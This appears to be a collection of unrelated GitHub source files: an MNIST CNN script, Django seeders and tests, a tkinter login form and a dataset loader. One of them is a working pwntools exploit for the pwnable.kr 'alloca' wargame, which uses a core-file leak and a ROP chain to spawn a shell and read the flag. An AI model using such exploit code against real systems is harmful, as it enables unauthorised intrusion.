trp_tutorial_fighter_2 = 910
trp_tutorial_fighter_3 = 911
trp_tutorial_fighter_4 = 912
trp_tutorial_archer_1 = 913
trp_tutorial_master_archer = 914
trp_tutorial_rider_1 = 915
trp_tutorial_rider_2 = 916
trp_tutorial_master_horseman = 917
trp_swadian_merchant = 918
trp_vaegir_merchant = 919
trp_khergit_merchant = 920
trp_nord_merchant = 921
trp_rhodok_merchant = 922
trp_sarranid_merchant = 923
trp_startup_merchants_end = 924
trp_sea_raider_leader = 925
trp_looter_leader = 926
trp_bandit_leaders_end = 927
trp_relative_of_merchant = 928
trp_relative_of_merchants_end = 929
| [
"noreply@github.com"
] | noreply@github.com |
5dcbe0033160dc757a948a5698293f07cbd725b4 | f0485eab61a2f11325cb4369db1d6ba5b681d670 | /cnn.py | 6f3a375c46bd044d0b6bcd6490c0840f83bdba25 | [] | no_license | dalilareis/Python-neural-networks | 8c6d48fe8a04dd33f6e78e490e1e98f14b8a2f63 | c515f774743d9e5c37b71ffa2eb27611596f74ce | refs/heads/master | 2020-04-16T00:05:31.422674 | 2019-01-10T20:16:30 | 2019-01-10T20:16:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,877 | py | import numpy as np
#from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.utils import np_utils
from keras import backend as K
K.set_image_dim_ordering('th') #pode ser 'th' ou 'tf'
import matplotlib.pyplot as plt
import utils
# fixar random seed para se poder reproduzir os resultados
seed = 9
np.random.seed(seed)
#----------------------------------------------------Etapa 1 - preparar o dataset------------------------------------------------------------------------
'''
fazer o download do MNIST dataset com imagens de digitos escritos à mão para fazer a sua classificação (já pré-preparados)
dataset: https://s3.amazonaws.com/img-datasets/mnist.npz
O ficheiro já tem tudo separado nos ficheiros {x_test.npy, x_train.npy, y_test.npy, y_train.npy}
Os atributos de entrada estão com matrizes 3D(imagem, largura,altura) e os atributos de saída é uma lista com o número correspondente
'''
def load_mnist_dataset(path):
f = np.load(path)
x_train = f['x_train']
y_train = f['y_train']
x_test = f['x_test']
y_test = f['y_test']
f.close()
return (x_train, y_train), (x_test, y_test)
#----------------------------Etapa 2 - Definir a topologia da rede (arquitectura do modelo) e compilar (convolutionary)----------------------------------
'''
- a primeira camada escondida é uma camada convolucionária chamada Convolution2D. A camada tem 32 feature maps , cada 1 de dimensão 5×5
e uma função de activação 'rectifier activation function'. Trata-se de uma camada de input, à espera de imagens com a estrutura [pixels][width][height].
- A segunda camada é de pooling que utiliza o max de MaxPooling2D. Está configurado para uma pool size de 2×2.
- A camada seguinte é de regularização que usa Dropout. Está configurado para excluir aleatoriamente 20% dos neuronios na camada para reduzir overfitting.
- A camada seguinte converte os dados da matriz 2D num vector chamado Flatten. Assim permite-se que esse output seja tratado por uma camada completamente
ligada standard.
- A camada seguinte é uma completamente ligada com 128 neuronios e uma função de activação 'rectifier activation function'.
- Finalmente a camada de saida tem 10 neuronios correspondentes às 10 classes e uma função de activação softmax para apresentar na saida uma especie
de probabilidade para cada classe.
- O modelo é treinado utilizando logarithmic loss e o algoritmo de gradient descent ADAM.
'''
def create_compile_model_cnn_simples(num_classes):
model = Sequential()
model.add(Conv2D(32, (5, 5), input_shape=(1, 28, 28), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
''' criar uma rede neuronal convolucionária mais complexa.
- Convolutional layer com 30 feature maps de dimensão 5×5.
- Pooling layer que passa o máximo de 2*2 patches.
- Convolutional layer com 15 feature maps de dimensão 3×3.
- Pooling layer que passa o máximo de 2*2 patches.
- Dropout layer com probabilidade de 20%.
- Flatten layer.
- Fully connected layer com 128 neuronios e activação rectifier.
- Fully connected layer com 50 neuronios e activação rectifier.
- Output layer.
- O modelo é treinado utilizando logarithmic loss e o algoritmo de gradient descent ADAM.
'''
def create_compile_model_cnn_plus(num_classes):
model = Sequential()
model.add(Conv2D(30, (5, 5), input_shape=(1, 28, 28), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(15, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
#model.add(Dense(50, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
# Compile model
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
def mnist_utilizando_cnn_simples():
(X_train, y_train), (X_test, y_test) = load_mnist_dataset('mnist.npz')
# transformar para o formato [instancias][pixeis][largura][altura]
X_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')
X_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')
# normalizar os valores dos pixeis de 0-255 para 0-1
X_train = X_train / 255
X_test = X_test / 255
# transformar o label que é um inteiro em categorias binárias, o valor passa a ser o correspondente à posição
# o 5 passa a ser a lista [0. 0. 0. 0. 0. 1. 0. 0. 0. 0.]
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
num_classes = y_test.shape[1]
# definir a topologia da rede e compilar
model = create_compile_model_cnn_simples(num_classes)
utils.print_model(model,"model_simples.png")
# treinar a rede
history = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=10, batch_size=100, verbose=2)
#print_history_accuracy(history)
utils.print_history_loss(history)
# Avaliação final com os casos de teste
scores = model.evaluate(X_test, y_test, verbose=0)
print('Scores: ', scores)
print("Erro modelo MLP: %.2f%%" % (100-scores[1]*100))
def mnist_utilizando_cnn_plus():
(X_train, y_train), (X_test, y_test) = load_mnist_dataset('mnist.npz')
# transformar para o formato [instancias][pixeis][largura][altura]
X_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')
X_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')
# normalizar os valores dos pixeis de 0-255 para 0-1
X_train = X_train / 255
X_test = X_test / 255
# transformar o label que é um inteiro em categorias binárias, o valor passa a ser o correspondente à posição
# o 5 passa a ser a lista [0. 0. 0. 0. 0. 1. 0. 0. 0. 0.]
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
num_classes = y_test.shape[1]
# definir a topologia da rede e compilar
model = create_compile_model_cnn_plus(num_classes)
utils.print_model(model,"model_plus.png")
# treinar a rede
history = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=12, batch_size=128, verbose=2)
#print_history_accuracy(history)
utils.print_history_loss(history)
# Avaliação final com os casos de teste
scores = model.evaluate(X_test, y_test, verbose=0)
print('Scores: ', scores)
print("Erro modelo MLP: %.2f%%" % (100-scores[1]*100))
#--------------------------------------------------------------MAIN--------------------------------------------------------------------------
if __name__ == '__main__':
#mnist_utilizando_cnn_simples()
mnist_utilizando_cnn_plus()
| [
"39201180+dalilareis@users.noreply.github.com"
] | 39201180+dalilareis@users.noreply.github.com |
3b58eb9af84d7927459d07e03208d9b68d128309 | 5fb848b4e4b590796388ff9ae323bc29ee17ac05 | /reviews/management/commands/seed_reviews.py | 5d9a7838a40c8793c5c9c4dd756b454cddd755a0 | [] | no_license | rodom1018/airbnb-clone | 3b6d775498de87dd8094582f2731ca9b1b83b6bb | 26052dc1765789d191bc4ff0384ad2e5e5c26717 | refs/heads/master | 2023-03-06T21:12:19.996304 | 2021-02-24T16:39:06 | 2021-02-24T16:39:06 | 337,055,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,344 | py | import random
from django.core.management.base import BaseCommand
from django_seed import Seed
from reviews import models as review_models
from users import models as user_models
from rooms import models as room_models
class Command(BaseCommand):
help = "This command creates reviews"
def add_arguments(self, parser):
parser.add_argument(
"--number", default=1, help="How many users you want to create"
)
def handle(self, *args, **options):
number = options.get("number")
seeder = Seed.seeder()
users = user_models.User.objects.all()
rooms = room_models.Room.objects.all()
seeder.add_entity(
review_models.Review,
int(number),
{
"accuracy": lambda x: random.randint(0, 6),
"communication": lambda x: random.randint(0, 6),
"cleanliness": lambda x: random.randint(0, 6),
"location": lambda x: random.randint(0, 6),
"check_in": lambda x: random.randint(0, 6),
"value": lambda x: random.randint(0, 6),
"room": lambda x: random.choice(rooms),
"user": lambda x: random.choice(users),
},
)
seeder.execute()
self.stdout.write(self.style.SUCCESS("Reviews created ! ")) | [
"enjoying1018@naver.com"
] | enjoying1018@naver.com |
699eda9c9fa27436875646f3e48e3a68b554030c | 94923becbb06260e3cd35dde46c3d1688c9f7feb | /wargames/pwnablekr/rookiss/alloca/win.py | b41641d53ba295cd19ff532a9f6708165421a956 | [
"MIT"
] | permissive | infernalheaven/examples | b1826d521b04ea5bf55c7c2b5a6cc620df59cfe9 | a3a3bfe2a7b9addea94396f21b73252c3bd56d49 | refs/heads/master | 2021-01-11T10:58:10.794931 | 2016-10-05T22:56:39 | 2016-10-05T22:56:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,582 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = 'pwnable.kr'
user = 'alloca'
password = 'guest'
binary = '/home/%s/%s' % (user,user)
chal = os.path.basename(binary)
shell = ssh(host=host, user=user, password=password, port=2222)
if not os.path.exists(chal):
shell.download_file(binary)
shell.download_file(binary + '.c')
os.chmod(chal, 0755)
#
# Disable ASLR so that DSO addresses are constant.
#
context.aslr = False
#
# Using a negative value for alloca allows us to overwrite the saved value
# of ESP on the stack.
#
# The offset which gives us this control is -92, though -88 throuh -96 also
# work.
#
# Because of the way things work out, the stack value will be XORed with
# some random stack trash. On the up-side, it is consistent from run-to-run.
# On the downside, it is not consistent between different versions of libc.
#
# In order to have a portable exploit (works locally and remotely), we will
# force the target binary to crash once, and scrape the value of ESP at the
# segfault by loading a corefile.
#
# In order for a corefile to drop, we have to be in a writable directory
shell.set_working_directory()
shell('ln -s %s .' % binary)
#
# Launch the process, and let it die a terrible death
#
# Note that we need the setuid bit to be ignored in order for a corefile we
# can use to be dropped.
#
p = shell.process('./alloca',
setuid=0)
address = 0xdeadbeef
cookie = str(signed(address))
pattern = cyclic(64)
data = fit({0: '-92',
16: cookie,
32: pattern},
filler='\n')
#
# All of the data should be sent at the same time, so that it is all
# buffered at once. The fgets() is actually a noop since the value is negative.
#
# We are relying on the buffering behavior of scanf().
#
p.sendline(data)
p.recvall()
# Grab the corefile after it's written. It may take a second or two to appear.
pause(2)
shell.download('core')
core = Core('core')
# We want to be sure that we crashed at the 'ret'
# Either we'll crash at that instruction (stack pointer is invalid)
# or at zero (stack pointer was valid, pointed at an empty page).
assert core.eip in (0x804878a, 0)
# Find out the XOR value. This is almost-always constant, but varies by 1 bit
# on the pwnable.kr server as of writing. Luckily, the 1 bit that changes is
# the '4' bit, so as long as we pad an extra 'ret' in our ROP, we're fine.
xor = address ^ core.esp
log.info("%08x xor magic" % xor)
# Find our data in the heap
address = core.search(pattern).next()
log.info("%08x heap address" % address)
#
# We need a bit of a RET sled because the XOR value isn't perfectly constant,
# but only varies by a small amount which we can account for.
#
libc = p.libc
rop = ROP(libc)
log.info("libc is at %#x" % libc.address)
binsh = libc.search('/bin/sh\x00').next()
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.execve(binsh,0,0)
log.info(rop.dump())
# Shoot for the middle of the RET sled
address += 8
# One very last time, to pwn it proper!
cookie = str(signed(address ^ xor))
data = fit({0: '-92',
16: cookie,
32: str(rop)},
filler='\n')
p = shell.process('./alloca')
# shell.upload('~/bin/gdbserver')
# shell('chmod +x gdbserver')
# p = gdb.debug('./alloca', '''
# break *0x804878a
# set follow-fork-mode child
# catch exec
# continue
# ''', ssh=shell)
p.sendline(data)
p.recvuntil('$')
p.clean()
p.sendline('cat /home/alloca/flag')
flag = p.recvline().strip()
log.success('Flag: %r' % flag)
p.interactive(prompt='')
| [
"riggle@google.com"
] | riggle@google.com |
c15923ef08c23fec06aafb4dd94a9314347fde9e | 3f227bd7695f9e8939d8a60cc087be8145b2d8c4 | /Bruning/login.py | 5c84a8e9c0c25ec5135b4d526eaa186ee700dd0e | [] | no_license | Rohit1220/website | 221ea78530a3b3e25a6e65bb7776edd1d086deec | e316d56e24a3bc2c77d555d31ed70db92fac2071 | refs/heads/main | 2023-08-24T20:12:40.614443 | 2021-10-17T03:14:53 | 2021-10-17T03:14:53 | 418,006,749 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | from tkinter import *
from functools import partial
def validateLogin(username, password):
print("username entered :", username.get())
print("password entered :", password.get())
return
#window
tkWindow = Tk()
tkWindow.geometry('400x150')
tkWindow.title('Tkinter Login Form - pythonexamples.org')
#username label and text entry box
usernameLabel = Label(tkWindow, text="User Name").grid(row=0, column=0)
username = StringVar()
usernameEntry = Entry(tkWindow, textvariable=username).grid(row=0, column=1)
#password label and password entry box
passwordLabel = Label(tkWindow,text="Password").grid(row=1, column=0)
password = StringVar()
passwordEntry = Entry(tkWindow, textvariable=password, show='*').grid(row=1, column=1)
validateLogin = partial(validateLogin, username, password)
#login button
loginButton = Button(tkWindow, text="Login", command=validateLogin).grid(row=4, column=0)
tkWindow.mainloop() | [
"noreply@github.com"
] | noreply@github.com |
95db0c673cf07182b0f50e3a61044670584016fd | bcc373fa3085956f776d22aaf57f5936225be1cc | /data_processing/__init__.py | a81d3f5c21079b6284e9eedbe8b6d9fc87532070 | [] | no_license | innpei/CycleGAN-cartoon-reenactment | b50180e06a50b8d28dae8d10f15485c19f5ae60c | 4bda867d42bd49796cd6aed30c03e74922660b26 | refs/heads/main | 2023-05-14T05:19:13.459522 | 2021-06-06T17:49:38 | 2021-06-06T17:49:38 | 372,128,755 | 0 | 3 | null | 2021-06-06T17:49:38 | 2021-05-30T05:12:10 | Python | UTF-8 | Python | false | false | 2,757 | py | import importlib
import torch.utils.data
from data.base_dataset import BaseDataset
def find_dataset_using_name(dataset_name):
"""Import the module "data/[dataset_name]_dataset.py".
In the file, the class called DatasetNameDataset() will
be instantiated. It has to be a subclass of BaseDataset,
and it is case-insensitive.
"""
dataset_filename = "data." + dataset_name + "_dataset"
datasetlib = importlib.import_module(dataset_filename)
dataset = None
target_dataset_name = dataset_name.replace('_', '') + 'dataset'
for name, cls in datasetlib.__dict__.items():
if name.lower() == target_dataset_name.lower() \
and issubclass(cls, BaseDataset):
dataset = cls
if dataset is None:
raise NotImplementedError("In %s.py, there should be a subclass of BaseDataset with class name that matches %s in lowercase." % (dataset_filename, target_dataset_name))
return dataset
def get_option_setter(dataset_name):
"""Return the static method <modify_commandline_options> of the dataset class."""
dataset_class = find_dataset_using_name(dataset_name)
return dataset_class.modify_commandline_options
def create_dataset(opt):
"""Create a dataset given the option.
This function wraps the class CustomDatasetDataLoader.
This is the main interface between this package and 'train.py'/'test.py'
Example:
>>> from data import create_dataset
>>> dataset = create_dataset(opt)
"""
data_loader = CustomDatasetDataLoader(opt)
dataset = data_loader.load_data()
return dataset
class CustomDatasetDataLoader():
"""Wrapper class of Dataset class that performs multi-threaded data loading"""
def __init__(self, opt):
"""Initialize this class
Step 1: create a dataset instance given the name [dataset_mode]
Step 2: create a multi-threaded data loader.
"""
self.opt = opt
dataset_class = find_dataset_using_name(opt.dataset_mode)
self.dataset = dataset_class(opt)
print("dataset [%s] was created" % type(self.dataset).__name__)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batch_size,
shuffle=not opt.serial_batches,
num_workers=int(opt.num_threads))
def load_data(self):
return self
def __len__(self):
"""Return the number of data in the dataset"""
return min(len(self.dataset), self.opt.max_dataset_size)
def __iter__(self):
"""Return a batch of data"""
for i, data in enumerate(self.dataloader):
if i * self.opt.batch_size >= self.opt.max_dataset_size:
break
yield data
| [
"noreply@github.com"
] | noreply@github.com |
96e6bd43916c8c2cec3c59ae650ad90479dfdf4c | 10c2ba04e502004e2df0dfb6c70fb83daccc1b30 | /Django/example/13-manytomany-field/main/index/tests.py | 221c544e303d6d0a99e73496308795bdfe36121c | [] | no_license | yakenohara/KnowHow | 5e79d0015220524f98d9f7c767d2a727534b612d | ccd2aed2d4bf9363136aa30778b5adf382b25c4d | refs/heads/master | 2023-04-05T09:37:14.612262 | 2023-03-26T05:56:40 | 2023-03-26T05:56:40 | 136,476,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,778 | py | import datetime
import json
import re
import textwrap
from unittest import mock
from django.core.files.base import ContentFile
from django.contrib.auth.models import User
from django.db.utils import OperationalError
from django.test import TestCase
from django.utils.timezone import make_aware
from accounts.models import TokenForRESTAPI
from authors.models import Author
from editors.models import Editor
from common.const import INT_TIMES_OF_RETRYING_CAUSE_OF_DEADLOCK, STR_ATTRIBUTE_KEYWORD_FOR_TOKEN
from index.views import makeDictFromBooks, makeDictFromBooksForRESTAPI
from index.models import Book
# Create your tests here.
class BookCreateTest(TestCase):
""" BookCreate """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
Author.objects.update_or_create(
id = 1,
defaults = {
'name': 'createdAuthor',
'birthday': None,
}
)
Editor.objects.update_or_create(
id = 1,
defaults = {
'name': 'createdEditor1',
'sex': Editor.Sex.FEMALE,
}
)
Editor.objects.update_or_create(
id = 2,
defaults = {
'name': 'createdEditor2',
'sex': None,
}
)
def test_001(self):
"""
使用するテンプレートファイルが正しいかどうか確認する
"""
obj_response = self.client.get('/create/')
self.assertTemplateUsed(obj_response, 'index/form.html')
def test_002(self):
"""
書籍登録に成功した際に著者一覧画面にリダイレクトされることを確認する(外部キー参照なし)
"""
dict_toSaveBook = {
'name': 'toSaveBook',
'author': '',
'editors': [],
}
obj_response = self.client.post('/create/', data = dict_toSaveBook)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_savedBook = Book.objects.filter(name = dict_toSaveBook['name']).first()
self.assertTrue(obj_savedBook)
self.assertEqual(obj_savedBook.author, None)
def test_003(self):
"""
書籍登録に成功した際に著者一覧画面にリダイレクトされることを確認する(外部キー参照あり)
"""
dict_toSaveBook = {
'name': 'toSaveBook',
'author': 1,
'editors': [1, 2]
}
obj_response = self.client.post('/create/', data = dict_toSaveBook)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_savedBook = Book.objects.filter(name = dict_toSaveBook['name']).first()
self.assertTrue(obj_savedBook)
self.assertEqual(obj_savedBook.author.name, 'createdAuthor')
class IndexTest(TestCase):
""" Index """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
def test_001(self):
"""
書籍一覧に使用されるテンプレートが正しいかどうか確認する
"""
obj_toCreateBook = Book.objects.create(
name = 'created book'
)
obj_response = self.client.get('/')
self.assertTemplateUsed(obj_response, 'index/index.html')
self.assertContains(obj_response, obj_toCreateBook.name, status_code = 200)
class BookUpdateTest(TestCase):
""" BookUpdate """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
self.obj_createBook, _ = Book.objects.update_or_create(
id = 1,
defaults = {
'name': 'created book',
'author': None,
}
)
Author.objects.update_or_create(
id = 1,
defaults = {
'name': 'created author',
'birthday': datetime.date(2000, 6, 10),
}
)
Editor.objects.update_or_create(
id = 1,
defaults = {
'name': 'createdEditor1',
'sex': None,
}
)
Editor.objects.update_or_create(
id = 2,
defaults = {
'name': 'createdEditor2',
'sex': None,
}
)
def test_001(self):
"""
書籍の編集画面に使用されるテンプレートが正しいかどうか確認する
"""
obj_response = self.client.get(f'/{self.obj_createBook.id}/update/')
self.assertTemplateUsed(obj_response, 'index/form.html')
def test_002(self):
"""
著者の編集成功時に正しい URL へリダイレクトされるかどうか確認する(外部キー参照なし)
"""
dict_toUpdateBook = {
'name': 'updated book',
'author': '',
'editors': [],
}
obj_response = self.client.post(f'/{self.obj_createBook.id}/update/', data = dict_toUpdateBook)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
self.assertTrue(Book.objects.filter(name = dict_toUpdateBook['name']).first())
def test_003(self):
"""
著者の編集成功時に正しい URL へリダイレクトされるかどうか確認する(外部キー参照あり)
"""
dict_toUpdateBook = {
'name': 'updated book',
'author': 1,
'editors': [1,2],
}
obj_response = self.client.post(f'/{self.obj_createBook.id}/update/', data = dict_toUpdateBook)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
self.assertEqual(Book.objects.filter(name = dict_toUpdateBook['name']).first().author.birthday, datetime.date(2000, 6, 10))
class BookDeleteTest(TestCase):
""" BookDelete """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
self.obj_createdBook, _ = Book.objects.update_or_create(
id = 1,
defaults = {
'name': 'created book',
'author': None,
}
)
def test_001(self):
"""
著者の削除成功時に正しい URL へリダイレクトされるかどうか確認する
"""
obj_response = self.client.delete(f'/{self.obj_createdBook.id}/delete/')
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
self.assertFalse(Author.objects.filter(name = self.obj_createdBook.name).first())
class makeDictFromBooksTest(TestCase):
""" makeDictFromBooks """
def setUp(self):
obj_createdAuthorA, _ = Author.objects.update_or_create(
id = 1,
defaults = {
'name': 'created author A',
'birthday': datetime.date(1999, 12, 13),
}
)
obj_createdAuthorB, _ = Author.objects.update_or_create(
id = 2,
defaults = {
'name': 'created author B',
'birthday': datetime.date(1999, 12, 13),
}
)
obj_createdEditorA, _ = Editor.objects.update_or_create(
id = 1,
defaults = {
'name': 'created editor A',
'sex': Editor.Sex.FEMALE,
}
)
obj_createdEditorB, _ = Editor.objects.update_or_create(
id = 2,
defaults = {
'name': 'created editor B',
'sex': None,
}
)
self.dict_books = []
self.dict_books.append(
Book.objects.create(
name = 'book A',
author = obj_createdAuthorA
)
)
self.dict_books.append(
Book.objects.create(
name = 'book B',
author = obj_createdAuthorB,
)
)
self.dict_books.append(
Book.objects.create(
name = 'book C',
author = None,
)
)
self.dict_books[2].editors.set([obj_createdEditorA, obj_createdEditorB])
self.dict_books[2].save()
def test_001(self):
"""
著者リストを辞書配列化する
"""
dict_expectedBooks = [
{
'id': 1,
'name': 'book A',
'author': 'created author A',
'editors': '',
},
{
'id': 2,
'name': 'book B',
'author': 'created author B',
'editors': '',
},
{
'id': 3,
'name': 'book C',
'author': '',
'editors': 'created editor A,created editor B',
},
]
self.assertEqual(makeDictFromBooks(None, self.dict_books), dict_expectedBooks)
class makeDictFromBooksForRESTAPITest(TestCase):
""" makeDictFromBooksForRESTAPI """
def setUp(self):
obj_createdAuthorA, _ = Author.objects.update_or_create(
id = 1,
defaults = {
'name': 'created author A',
'birthday': datetime.date(1999, 12, 13),
}
)
obj_createdAuthorB, _ = Author.objects.update_or_create(
id = 2,
defaults = {
'name': 'created author B',
'birthday': datetime.date(1999, 12, 13),
}
)
obj_createdEditorA, _ = Editor.objects.update_or_create(
id = 1,
defaults = {
'name': 'created editor A',
'sex': Editor.Sex.FEMALE,
}
)
obj_createdEditorB, _ = Editor.objects.update_or_create(
id = 2,
defaults = {
'name': 'created editor B',
'sex': None,
}
)
self.dict_books = []
self.dict_books.append(
Book.objects.create(
name = 'book A',
author = obj_createdAuthorA
)
)
self.dict_books.append(
Book.objects.create(
name = 'book B',
author = obj_createdAuthorB,
)
)
self.dict_books.append(
Book.objects.create(
name = 'book C',
author = None,
)
)
self.dict_books[2].editors.set([obj_createdEditorA, obj_createdEditorB])
self.dict_books[2].save()
def test_001(self):
"""
著者リストを辞書配列化する
"""
dict_expectedBooks = [
{
'id': 1,
'name': 'book A',
'author': 'created author A',
'editors': [],
},
{
'id': 2,
'name': 'book B',
'author': 'created author B',
'editors': [],
},
{
'id': 3,
'name': 'book C',
'author': '',
'editors': [
'created editor A',
'created editor B'
]
},
]
self.assertEqual(makeDictFromBooksForRESTAPI(None, self.dict_books), dict_expectedBooks)
class export_as_csvTest(TestCase):
""" export_as_csv """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
obj_authorA, _ = Author.objects.update_or_create(
id = 1,
defaults = {
'name': 'author A',
}
)
obj_authorB, _ = Author.objects.update_or_create(
id = 2,
defaults = {
'name': 'author B',
'birthday': None,
}
)
obj_authorC, _ = Author.objects.update_or_create(
id = 3,
defaults = {
'name': 'author C',
'birthday': datetime.date(2000, 10 ,13),
}
)
obj_createdEditorA, _ = Editor.objects.update_or_create(
id = 1,
defaults = {
'name': 'created editor A',
'sex': Editor.Sex.FEMALE,
}
)
obj_createdEditorB, _ = Editor.objects.update_or_create(
id = 2,
defaults = {
'name': 'created editor B',
'sex': None,
}
)
Book.objects.update_or_create(
id = 1,
defaults = {
'name': 'book A',
'author': obj_authorA
}
)
Book.objects.update_or_create(
id = 2,
defaults = {
'name': 'book B',
'author': obj_authorB
}
)
Book.objects.update_or_create(
id = 3,
defaults = {
'name': 'book C',
'author': obj_authorC
}
)
obj_book, _ = Book.objects.update_or_create(
id = 4,
defaults = {
'name': 'book D',
'author': None
}
)
obj_book.editors.set([obj_createdEditorA, obj_createdEditorB])
obj_book.save()
def test_001(self):
"""
CSV 形式で出力されることを確認
"""
obj_response = self.client.get('/export_as_csv/')
self.assertEqual(obj_response.status_code, 200)
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
class import_from_csvTest(TestCase):
""" import_from_csv """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
obj_authorA, _ = Author.objects.update_or_create(
id = 1,
defaults = {
'name': 'author A',
}
)
obj_authorB, _ = Author.objects.update_or_create(
id = 2,
defaults = {
'name': 'author B',
'birthday': None,
}
)
obj_authorC, _ = Author.objects.update_or_create(
id = 3,
defaults = {
'name': 'author C',
'birthday': datetime.date(2000, 10 ,13),
}
)
obj_createdEditorA, _ = Editor.objects.update_or_create(
id = 1,
defaults = {
'name': 'created editor A',
'sex': Editor.Sex.FEMALE,
}
)
obj_createdEditorB, _ = Editor.objects.update_or_create(
id = 2,
defaults = {
'name': 'created editor B',
'sex': None,
}
)
Book.objects.update_or_create(
id = 1,
defaults = {
'name': 'book A',
'author': obj_authorA
}
)
Book.objects.update_or_create(
id = 2,
defaults = {
'name': 'book B',
'author': obj_authorB
}
)
Book.objects.update_or_create(
id = 3,
defaults = {
'name': 'book C',
'author': obj_authorC
}
)
obj_book, _ = Book.objects.update_or_create(
id = 4,
defaults = {
'name': 'book D',
'author': None
}
)
obj_book.editors.set([obj_createdEditorA, obj_createdEditorB])
obj_book.save()
def test_001(self):
"""
CSVImputForm のバリデーションエラー
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,"added, name",,
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText)
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
str_behavior = re.sub(r'\r', r'\n', str_behavior)
self.assertEqual(str_behavior, str_expected)
def test_002(self):
"""
UnicodeDecodeError
"""
str_toImportCSVText = textwrap.dedent('''\
ID,著書名,著者名,編集者名
5,"added, name",,
''')
# 改行 コードを `\r\n` に統一
str_toImportCSVText = re.sub(r'\r\n', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\r', r'\n', str_toImportCSVText)
str_toImportCSVText = re.sub(r'\n', r'\r\n', str_toImportCSVText)
obj_csvfile = ContentFile(str_toImportCSVText.encode('shift-jis'))
obj_csvfile.name = 'books.csv'
dict_toImportData = {
'file': obj_csvfile,
'mode': 'update',
}
obj_response = self.client.post('/import_from_csv/', data = dict_toImportData)
self.assertEqual(obj_response.status_code, 302)
self.assertEqual(obj_response.url, '/')
obj_response = self.client.get('/export_as_csv/')
str_expected = textwrap.dedent('''\
ID,著書名,著者名,編集者名
1,book A,author A,
2,book B,author B,
3,book C,author C,
4,book D,,"created editor A,created editor B"
''')
# 改行 コードを `\n` に統一
str_expected = re.sub(r'\r\n', r'\n', str_expected)
str_expected = re.sub(r'\r', r'\n', str_expected)
str_behavior = obj_response.content.decode('utf-8-sig')
str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
